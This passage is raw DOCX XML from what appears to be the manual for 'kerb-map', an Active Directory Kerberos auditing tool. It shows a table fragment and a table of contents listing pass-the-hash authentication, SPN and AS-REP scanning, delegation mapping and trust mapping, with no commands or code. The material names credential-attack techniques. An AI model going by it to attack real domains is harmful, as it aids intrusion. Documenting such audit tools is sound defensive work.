            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20000011" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20000012" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000001C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Output is a Rich table showing trust partner, direction, type, SID filtering status, and risk level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01119DB1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDB4E78" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00707BE4">
      <w:pPr>
        <w:sectPr w:rsidR="00707BE4">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475E09CB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc224561280"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Table of Contents"/>
        <w:id w:val="1249779898"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="7DAA7890" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText>TOC \h \o "1-3"</w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc224561280" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561280 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>2</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FE01D4F" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561281" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.  Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561281 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>4</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23D10FE1" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561282" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1  What kerb-map Does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561282 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>4</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="265AFCB6" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561283" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2  Philosophy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561283 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>4</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B9DA105" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561284" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3  Prerequisites</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561284 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>4</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3936FA8F" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561285" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.  Quick Start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561285 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>6</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D370D34" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561286" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1  Basic Scan — Password Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561286 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>6</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="140241C9" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561287" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2  Pass-the-Hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561287 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>6</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35A270D8" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561288" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3  Kerberos Ticket (ccache)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561288 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>6</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33CFEA7B" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561289" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4  Full Scan With CVEs and JSON Export</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561289 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>6</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A634C9F" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561290" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.  Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561290 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>7</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E7F44BB" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561291" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1  Plaintext Password (-p)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561291 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>7</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="537C9306" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561292" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2  Pass-the-Hash (-H)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561292 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>7</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D2125E4" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561293" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3  Kerberos ccache (-k)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561293 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>7</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BB79E6E" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561294" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.  Module Reference</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561294 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>8</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E45AC84" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561295" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1  SPN Scanner  (--spn)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561295 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>8</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11F81388" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561296" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How it works</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561296 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>8</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7511F822" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561297" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scoring Algorithm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561297 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>8</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D69253D" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561298" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561298 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>8</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55C67CC9" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561299" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2  AS-REP Scanner  (--asrep)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561299 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>9</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AAE0CE0" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561300" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LDAP Filter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561300 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>9</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4230CFC2" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561301" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scoring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561301 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>9</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="659F0BE8" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561302" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3  Delegation Mapper  (--delegation)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561302 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>9</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2198B998" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561303" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.1  Unconstrained Delegation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561303 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>9</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B14CEC9" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561304" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.2  Constrained Delegation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561304 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>9</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="684DFBAA" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561305" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.3  Resource-Based Constrained Delegation (RBCD)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561305 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>10</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12BC9256" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561306" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4  User Enumerator  (--users)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561306 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>10</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1000001D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>4.5  Encryption Auditor  (--encryption)</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1000001E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>4.6  Trust Mapper  (--trusts)</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="67469E18" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561307" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DnsAdmins — Why It Matters</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561307 \h </w:instrText>
